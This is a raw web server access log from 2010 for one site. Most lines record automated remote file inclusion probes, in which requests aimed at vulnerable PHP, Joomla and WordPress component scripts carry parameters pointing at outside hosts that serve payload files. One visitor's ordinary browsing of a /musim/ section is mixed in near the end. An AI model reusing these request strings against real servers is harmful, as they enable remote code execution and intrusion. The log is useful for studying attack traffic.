194.63.235.157 - - [18/Feb/2010:05:39:04 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [18/Feb/2010:05:39:21 -0800] "GET /logs/access_100107.log//admin/classes/TplLoad.php?full_path_to_public_program=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [18/Feb/2010:05:39:21 -0800] "GET /logs/access_100107.log//admin/classes/TplLoad.php?full_path_to_public_program=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.56.28 - - [18/Feb/2010:05:39:21 -0800] "GET /logs/access_100119.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.anabolex.com/gallery/uploads/8243/id/a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:05:39:26 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:05:39:26 -0800] "GET /logs/access_100208.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:05:39:26 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.222.56.28 - - [18/Feb/2010:05:39:35 -0800] "GET /logs/access_100121.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.anabolex.com/gallery/uploads/8243/id/a?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.97.64.32 - - [18/Feb/2010:05:39:39 -0800] "GET /logs/access_100122.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.uri.edu/uri/satu?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [18/Feb/2010:05:40:10 -0800] "GET /logs/access_100205.log//bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [18/Feb/2010:05:40:10 -0800] "GET /logs/access_100126.log//bbs/write_update.php?board_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [18/Feb/2010:05:40:12 -0800] "GET /logs/access_100208.log//admin/classes/TplLoad.php?full_path_to_public_program=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [18/Feb/2010:05:40:12 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [18/Feb/2010:05:40:12 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://ufaeda.ru//poll/id.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.227.54.174 - - [18/Feb/2010:05:40:22 -0800] "GET /components/errors.php?error=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.227.54.174 - - [18/Feb/2010:05:40:23 -0800] "GET /logs//components/errors.php?error=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.227.54.174 - - [18/Feb/2010:05:40:23 -0800] "GET /logs/access_100104.log%20%20//components/errors.php?error=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [18/Feb/2010:05:40:43 -0800] "GET /logs//ggambo7002_board/comment_modify.php?dir=http://opium.se/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [18/Feb/2010:05:40:43 -0800] "GET /ggambo7002_board/comment_modify.php?dir=http://opium.se/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [18/Feb/2010:05:40:47 -0800] "GET /logs/access_100119.log//ggambo7002_board/comment_modify.php?dir=http://opium.se/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.15.24.16 - - [18/Feb/2010:05:40:59 -0800] "GET /logs/access_100204.log//ggambo7002_board/comment_modify.php?dir=http://opium.se/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:05:41:16 -0800] "GET /logs/access_100104.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.189.224.16 - - [18/Feb/2010:05:41:19 -0800] "GET /logs/access_100104.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://ufaeda.ru//poll/id.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [18/Feb/2010:05:42:40 -0800] "GET /logs/bbs/delete_all.php?board_skin_path=http://partner.waawaa.com//renewal/images/int_11.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [18/Feb/2010:05:42:40 -0800] "GET /bbs/delete_all.php?board_skin_path=http://partner.waawaa.com//renewal/images/int_11.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.141.1.113 - - [18/Feb/2010:05:42:40 -0800] "GET /logs/access_100121.log/bbs/delete_all.php?board_skin_path=http://partner.waawaa.com//renewal/images/int_11.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.227.54.174 - - [18/Feb/2010:05:42:41 -0800] "GET /logs/access_100111.log%20%20//components/errors.php?error=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.227.54.174 - - [18/Feb/2010:05:42:53 -0800] "GET /logs/access_100130.log%20%20//components/errors.php?error=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.227.54.174 - - [18/Feb/2010:05:43:58 -0800] "GET /logs/access_100121.log%20%20//components/errors.php?error=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.227.54.174 - - [18/Feb/2010:05:44:16 -0800] "GET /logs/access_100123.log%20%20//components/errors.php?error=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:05:46:03 -0800] "GET /logs/access_100119.log%20%20///index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sanvan.net/new/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:05:46:03 -0800] "GET /logs///index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sanvan.net/new/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:05:46:04 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sanvan.net/new/id1? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:05:46:14 -0800] "GET /logs/access_100119.log%20%20///index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sanvan.net/new/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:05:46:14 -0800] "GET /logs///index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sanvan.net/new/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:05:46:15 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=com_glossary&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.sanvan.net/new/id1? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [18/Feb/2010:05:47:10 -0800] "GET /logs/access_100114.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.180.117.132 - - [18/Feb/2010:05:47:10 -0800] "GET /logs/access_100111.log//ashnews.php?pathtoashnews=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.180.117.132 - - [18/Feb/2010:05:47:27 -0800] "GET /logs/access_100114.log//ashnews.php?pathtoashnews=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
98.129.77.98 - - [18/Feb/2010:05:48:06 -0800] "GET /logs/access_100121.log/bbs/delete_all.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
98.129.77.98 - - [18/Feb/2010:05:48:07 -0800] "GET /bbs/delete_all.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
98.129.77.98 - - [18/Feb/2010:05:48:07 -0800] "GET /bbs/delete_all.php?board_skin_path=http://www.eywestco.co.kr/upfiles/log.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
98.129.77.98 - - [18/Feb/2010:05:48:07 -0800] "GET /logs/bbs/delete_all.php?board_skin_path=http://www.eywestco.co.kr/upfiles/README.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
82.77.131.46 - - [18/Feb/2010:05:48:09 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.77.131.46 - - [18/Feb/2010:05:48:09 -0800] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.77.131.46 - - [18/Feb/2010:05:48:09 -0800] "GET /logs/access_100208.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.77.131.46 - - [18/Feb/2010:05:48:09 -0800] "GET /logs/access_100117.log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:05:48:25 -0800] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:05:48:25 -0800] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:05:48:25 -0800] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:05:48:25 -0800] "GET /logs/access.log%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:05:48:25 -0800] "GET /logs/access.log%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.227.54.174 - - [18/Feb/2010:05:48:28 -0800] "GET /logs/access_100205.log%20%20//components/errors.php?error=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.188.133.214 - - [18/Feb/2010:05:48:55 -0800] "GET /logs/access_100117.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.180.117.132 - - [18/Feb/2010:05:49:24 -0800] "GET /logs/access_100111.log//ashnews.php?pathtoashnews=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.180.117.132 - - [18/Feb/2010:05:49:30 -0800] "GET /logs/access_100114.log//ashnews.php?pathtoashnews=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:05:49:59 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.sanvan.net/new/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:05:49:59 -0800] "GET /logs/access_100109.log%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.sanvan.net/new/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:05:49:59 -0800] "GET /logs/access_100126.log%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.sanvan.net/new/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:05:49:59 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.sanvan.net/new/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:05:50:13 -0800] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.sanvan.net/new/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:05:50:13 -0800] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.sanvan.net/new/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:05:50:13 -0800] "GET /logs/access_100109.log%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.sanvan.net/new/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:05:50:13 -0800] "GET /logs/access_100126.log%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.sanvan.net/new/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [18/Feb/2010:05:50:26 -0800] "GET /logs/access_100117.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.205.49.120 - - [18/Feb/2010:05:50:54 -0800] "GET /errors.php?error=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.205.49.120 - - [18/Feb/2010:05:50:54 -0800] "GET /logs//errors.php?error=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.205.49.120 - - [18/Feb/2010:05:51:22 -0800] "GET /logs/access_100129.log//errors.php?error=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.227.54.174 - - [18/Feb/2010:05:51:32 -0800] "GET /logs/access_100112.log%20%20//components/errors.php?error=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:05:51:44 -0800] "GET /logs/index.php?redir=http://www.sanvan.net/new/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:05:51:44 -0800] "GET /logs/access_100119.log%20%20/index.php?redir=http://www.sanvan.net/new/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:05:51:44 -0800] "GET /logs/access_100123.log%20%20/index.php?redir=http://www.sanvan.net/new/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:05:51:45 -0800] "GET /index.php?redir=http://www.sanvan.net/new/id1? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:05:51:51 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.sanvan.net/new/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:05:51:51 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.sanvan.net/new/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:05:51:51 -0800] "GET /logs/access_100109.log%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.sanvan.net/new/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:05:51:52 -0800] "GET /logs/access_100119.log%20%20/index.php?redir=http://www.sanvan.net/new/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:05:51:52 -0800] "GET /logs/index.php?redir=http://www.sanvan.net/new/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:05:51:52 -0800] "GET /logs/access_100123.log%20%20/index.php?redir=http://www.sanvan.net/new/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:05:51:52 -0800] "GET /index.php?redir=http://www.sanvan.net/new/id1? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:51:59 -0800] "GET /musim HTTP/1.1" 301 90 "http://musim.biz/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:51:59 -0800] "GET /musim/ HTTP/1.1" 200 1991 "http://musim.biz/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:00 -0800] "GET /musim/i/countdown.js HTTP/1.1" 200 10638 "http://www.puaga.com/musim/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:05 -0800] "GET /musim/i/MusimLoginIntro3.5.New.jpg HTTP/1.1" 404 5258 "http://www.puaga.com/musim/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:05 -0800] "GET /musim/i/Musim_LoginButton.gif HTTP/1.1" 200 1184 "http://www.puaga.com/musim/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:05 -0800] "GET /musim/i/Musim_LoginBack.gif HTTP/1.1" 200 3577 "http://www.puaga.com/musim/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:05 -0800] "GET /musim/i3/MusimLoginIntro3.5.New.jpg HTTP/1.0" 200 13688 "http://www.puaga.com/musim/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:12 -0800] "POST /musim/index.php HTTP/1.1" 302 110 "http://www.puaga.com/musim/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:14 -0800] "GET /musim/container.php HTTP/1.1" 200 7364 "http://www.puaga.com/musim/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:14 -0800] "GET /style/pngHack.css HTTP/1.1" 200 42 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:14 -0800] "GET /musim/i/prototype.js HTTP/1.1" 200 129738 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:17 -0800] "GET /musim/subbar/player.js HTTP/1.1" 200 2585 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:18 -0800] "GET /musim/stylefiles/v3menu.js HTTP/1.1" 200 824 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:19 -0800] "GET /musim/stylefiles/v3menu.css HTTP/1.1" 200 1960 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:19 -0800] "GET /musim/stylefiles/musimbutton.css HTTP/1.1" 200 900 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:19 -0800] "GET /musim/stylefiles/breadcrumb.css HTTP/1.1" 200 1612 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:19 -0800] "GET /musim/scripts/ajax.js HTTP/1.1" 200 443 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:19 -0800] "GET /musim/stylefiles/breadcrumb-button.css HTTP/1.1" 200 902 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:19 -0800] "GET /musim/scripts/jquery.js HTTP/1.1" 200 57002 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:21 -0800] "GET /musim/scripts/boxy.js HTTP/1.1" 200 21262 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
88.191.43.7 - - [18/Feb/2010:05:52:23 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [18/Feb/2010:05:52:23 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:23 -0800] "GET /musim/stylefiles/boxy.css HTTP/1.1" 200 2491 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:23 -0800] "GET /musim/stylefiles/style_footer.css HTTP/1.1" 200 142 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:23 -0800] "GET /musim/stylefiles/style_profileboxes.css HTTP/1.1" 200 1588 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:23 -0800] "GET /musim/scripts/applications.js HTTP/1.1" 200 2948 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
88.191.43.7 - - [18/Feb/2010:05:52:23 -0800] "GET /logs/access_100107.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [18/Feb/2010:05:52:27 -0800] "GET /logs/access_100126.log%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.sanvan.net/new/id1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:27 -0800] "GET /musim/scripts/tipsy.js HTTP/1.1" 200 2537 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
85.101.252.52 - - [18/Feb/2010:05:52:28 -0800] "GET /musim/scripts/uploader.js HTTP/1.1" 200 3452 "http://www.puaga.com/musim/container.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.0.17) Gecko/2009122116 Firefox/3.0.17 (.NET CLR 3.5.30729)" "www.puaga.com"
88.191.43.7 - - [18/Feb/2010:05:52:29 -0800] "GET /logs/access_100121.log%20%20/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.sinhvienqb.com/news/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
